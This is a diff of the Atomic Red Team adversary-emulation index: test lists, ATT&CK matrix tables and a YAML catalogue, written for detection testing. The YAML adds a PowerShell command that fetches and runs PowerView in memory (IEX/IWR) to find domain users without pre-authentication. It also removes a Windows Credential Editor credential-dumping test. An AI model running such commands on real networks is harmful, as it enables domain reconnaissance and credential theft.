   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
@@ -637,6 +667,7 @@
   - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
   - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
   - Atomic Test #9: DiskShadow Command Execution [windows]
+  - Atomic Test #10: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
 - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
   - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
   - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -706,7 +737,8 @@
   - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
   - Atomic Test #3: Persist, Download, & Execute [windows]
   - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1176 Browser Extensions](../../T1176/T1176.md)
@@ -794,6 +826,8 @@
   - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
+  - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
   - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -866,6 +900,7 @@
   - Atomic Test #6: Windows - Delete Backup Files [windows]
   - Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
   - Atomic Test #8: Windows - Disable the SR scheduled task [windows]
+  - Atomic Test #9: Disable System Restore Through Registry [windows]
 - [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md)
   - Atomic Test #1: Replace Desktop Wallpaper [windows]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -904,6 +939,8 @@
   - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
   - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
   - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
+  - Atomic Test #11: Get-DomainUser with PowerView [windows]
+  - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
   - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
   - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -913,6 +950,11 @@
   - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
   - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
   - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
+  - Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
+  - Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
+  - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
   - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
   - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -925,6 +967,7 @@
 - [T1083 File and Directory Discovery](../../T1083/T1083.md)
   - Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
   - Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
+  - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
   - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
@@ -951,11 +994,16 @@
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
   - Atomic Test #5: Examine local password policy - Windows [windows]
   - Atomic Test #6: Examine domain password policy - Windows [windows]
+  - Atomic Test #8: Get-DomainPolicy with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
   - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
   - Atomic Test #2: Process Discovery - tasklist [windows]
+  - Atomic Test #3: Process Discovery - Get-Process [windows]
+  - Atomic Test #4: Process Discovery - get-wmiObject [windows]
+  - Atomic Test #5: Process Discovery - wmic process [windows]
 - [T1012 Query Registry](../../T1012/T1012.md)
   - Atomic Test #1: Query Registry [windows]
 - [T1018 Remote System Discovery](../../T1018/T1018.md)
@@ -969,6 +1017,10 @@
   - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
   - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
   - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
+  - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
+  - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #18: Get-DomainController with PowerView [windows]
+  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -1165,6 +1217,7 @@
   - Atomic Test #1: Create and Execute Batch Script [windows]
   - Atomic Test #2: Writes text to a file and displays it. [windows]
   - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
+  - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
   - Atomic Test #1: WMI Reconnaissance Users [windows]
   - Atomic Test #2: WMI Reconnaissance Processes [windows]

atomics/Indexes/Matrices/matrix.md

@@ -12,9 +12,9 @@
 | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/windows-matrix.md

@@ -11,7 +11,7 @@
 | [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | [BITS Jobs](../../T1197/T1197.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Replication Through Removable Media](../../T1091/T1091.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [Forced Authentication](../../T1187/T1187.md) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -60,7 +60,7 @@
 |  |  | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
-|  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
 |  |  | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |

atomics/Indexes/index.yaml

@@ -341,6 +341,20 @@ credential-access:
 '
         name: powershell
         elevation_required: false
+    - name: Get-DomainUser with PowerView
+      auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a
+      description: 'Utilizing PowerView, run Get-DomainUser to identify domain users.
+        Upon execution, progress and info about users within the domain being scanned
+        will be displayed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+        name: powershell
   T1552.003:
     technique:
       external_references:
@@ -3573,57 +3587,6 @@ credential-access:
       - Ed Williams, Trustwave, SpiderLabs
       identifier: T1003.001
     atomic_tests:
-    - name: Windows Credential Editor
-      auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
-      description: "Dump user credentials using Windows Credential Editor (supports
-        Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)\n\nUpon successful execution,
-        you should see a file with user passwords/hashes at %temp%/wce-output.file.\n\nIf
-        you see no output it is likely that execution was blocked by Anti-Virus. \n\nIf
-        you see a message saying \\\"wce.exe is not recognized as an internal or external
-        command\\\", try using the  get-prereq_commands to download and install Windows
-        Credential Editor first.\n"
-      supported_platforms:
-      - windows
-      input_arguments:
-        output_file:
-          description: Path where resulting data should be placed
-          type: Path
-          default: "%temp%\\wce-output.txt"
-        wce_zip_hash:
-          description: File hash of the Windows Credential Editor zip file
-          type: String
-          default: 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933
-        wce_exe:
-          description: Path of Windows Credential Editor executable
